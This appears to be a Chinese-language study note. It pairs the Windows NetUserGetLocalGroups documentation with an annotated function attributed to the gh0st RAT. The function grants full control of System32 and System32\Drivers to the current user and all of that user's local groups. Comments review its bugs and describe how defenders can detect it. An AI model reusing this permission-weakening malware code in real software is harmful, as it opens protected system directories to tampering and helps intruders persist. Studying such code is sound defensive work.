The NetUserGetLocalGroups function retrieves a list of local groups to which a specified user belongs.
也就是获取一组特定用户所属的本地组
NET_API_STATUS NetUserGetLocalGroups(
_In_ LPCWSTR servername, //指向DNS或者网络基本输入的指针;若为NULL,the local computer is used.
_In_ LPCWSTR username, //指针常量字符串,返回本地组成员信息,如果DomainName\UserName在domain中,那么
//用户名将会在服务器名指定的服务器上得到
_In_ DWORD level, //为0
_In_ DWORD flags, //影响标志位的操作,Currently, only the value defined is LG_INCLUDE_INDIRECT
_Out_ LPBYTE *bufptr, //存储数据的缓冲区
//This buffer is allocated by the system and must be freed using the NetApiBufferFree function
_In_ DWORD prefmaxlen, //首选的最大长度,若为MAX_PREFERRED_LENGTH,则根据所需的长度自动分配长度
_Out_ LPDWORD entriesread, //获得的元素枚举的数量
_Out_ LPDWORD totalentries //所接受的条目总数,包含枚举
);
Return value
If the function succeeds, the return value is NERR_Success.
If the function fails, the return value can be one of the following error codes.
| Return code | Description |
|---|---|
| ERROR_ACCESS_DENIED | The user does not have access rights to the requested information. This error is also returned if the servername parameter has a trailing blank. |
| ERROR_INVALID_LEVEL | The system call level is not correct. This error is returned if the level parameter was not specified as 0. |
| ERROR_INVALID_PARAMETER | A parameter is incorrect. This error is returned if the flags parameter contains a value other than LG_INCLUDE_INDIRECT. |
| ERROR_MORE_DATA | More entries are available. Specify a large enough buffer to receive all entries. |
| ERROR_NOT_ENOUGH_MEMORY | Insufficient memory was available to complete the operation. |
| NERR_DCNotFound | The domain controller could not be found. |
| NERR_UserNotFound | The user could not be found. This error is returned if the username could not be found. |
| RPC_S_SERVER_UNAVAILABLE | The RPC server is unavailable. This error is returned if the servername parameter could not be found. |
列举gh0st0上面的一个方法
/*
 * SetAccessRights
 *
 * Grants GENERIC_ALL on the system directory (GetSystemDirectory) and on its
 * "\Drivers" subdirectory to the current user, and then to every local group
 * that user is a member of (NetUserGetLocalGroups with LG_INCLUDE_INDIRECT).
 * The ACE itself is written by AddAccessRights(), which is not visible in this
 * listing; presumably it appends an allow ACE for the named account — confirm
 * against its body.
 *
 * Review notes (code left unchanged):
 *  - Every API return value is ignored: GetSystemDirectory, GetUserName,
 *    MultiByteToWideChar and WideCharToMultiByte. If any of them fails, the
 *    subsequent calls operate on an empty or uninitialized buffer.
 *  - lpGroupName is the only buffer that is not zeroed, so a failing
 *    WideCharToMultiByte leaves it uninitialized when it reaches
 *    AddAccessRights.
 *  - lstrcat() appends "\\Drivers" to a MAX_PATH buffer without checking the
 *    remaining space.
 *  - Buffers are declared as char and sizeof() is passed as a character
 *    count, so this assumes an ANSI (non-UNICODE) build — a UNICODE build
 *    would change the meaning of those size arguments.
 *  - Defensive view: this is a DACL weakening of the system directory. A
 *    full-control grant on %SystemRoot%\System32 to a non-administrative
 *    principal or group is a strong host indicator; object-access auditing
 *    on that directory records the permission change.
 */
void SetAccessRights()
{
/*
 * Buffers for the user name, a group name, the Drivers directory and the
 * system directory. nSize is the character capacity of lpUserName and is
 * updated by GetUserName with the length actually written.
 */
char lpUserName[50], lpGroupName[100], lpDriverDirectory[MAX_PATH], lpSysDirectory[MAX_PATH];
DWORD nSize = sizeof(lpUserName);
LPLOCALGROUP_USERS_INFO_0 pBuf = NULL;  /* system-allocated; released with NetApiBufferFree */
DWORD dwEntriesRead = 0;
DWORD dwTotalEntries = 0;
NET_API_STATUS nStatus;
WCHAR wUserName[100];                   /* wide copy of lpUserName for the Net* API */
/*
 * Zero the path and user-name buffers. Note that lpGroupName is not zeroed.
 */
ZeroMemory(lpUserName, sizeof(lpUserName));
ZeroMemory(lpDriverDirectory, sizeof(lpDriverDirectory));
ZeroMemory(lpSysDirectory, sizeof(lpSysDirectory));
/*
 * Fetch the system directory twice (once per target path). GetSystemDirectory
 * returns the length written, or the required length if the buffer is too
 * small; that return value is not checked here.
 */
GetSystemDirectory(lpSysDirectory, sizeof(lpSysDirectory));
GetSystemDirectory(lpDriverDirectory, sizeof(lpDriverDirectory));
lstrcat(lpDriverDirectory, "\\Drivers");  /* unbounded append into a MAX_PATH buffer */
GetUserName(lpUserName, &nSize);/* current user name; nSize receives the length written. Return value unchecked. */
/* Grant the current user GENERIC_ALL on both directories, then widen the name for NetUserGetLocalGroups. */
AddAccessRights(lpSysDirectory, lpUserName, GENERIC_ALL);
AddAccessRights(lpDriverDirectory, lpUserName, GENERIC_ALL);
MultiByteToWideChar( CP_ACP, 0, lpUserName, -1, wUserName, sizeof(wUserName) / sizeof(wUserName[0]));
/*
 * Retrieve the local groups the user belongs to (see MSDN).
 * NetUserGetLocalGroups returns the list of local groups of which a user is
 * a member. Per the original author's note, on Windows Server 2003 and
 * Windows XP the call may leak memory: if the user belongs to no local group,
 * not all of the allocated buffer is released.
 */
nStatus = NetUserGetLocalGroups(NULL,
(LPCWSTR)wUserName,
0,
LG_INCLUDE_INDIRECT,
(LPBYTE *) &pBuf,
MAX_PREFERRED_LENGTH,
&dwEntriesRead,
&dwTotalEntries);
if (nStatus == NERR_Success) /* If the function succeeds, the return value is NERR_Success. */
{
LPLOCALGROUP_USERS_INFO_0 pTmpBuf;
DWORD i;
if ((pTmpBuf = pBuf) != NULL)
{
for (i = 0; i < dwEntriesRead; i++)
{
if (pTmpBuf == NULL)  /* redundant: pTmpBuf is only ever incremented, never reset to NULL */
break;
/* Narrow the group name; on failure lpGroupName is left uninitialized (return value unchecked). */
WideCharToMultiByte(CP_OEMCP, 0, (LPCWSTR)pTmpBuf->lgrui0_name, -1, (LPSTR)lpGroupName, sizeof(lpGroupName), NULL, FALSE);
/* Grant each local group GENERIC_ALL on both directories. */
AddAccessRights(lpSysDirectory, lpGroupName, GENERIC_ALL);/* group ACE on the system directory */
AddAccessRights(lpDriverDirectory, lpGroupName, GENERIC_ALL);
pTmpBuf++;
}
}
}
if (pBuf != NULL) /* release the system-allocated buffer (NetApiBufferFree(NULL) would also be safe) */
NetApiBufferFree(pBuf);
}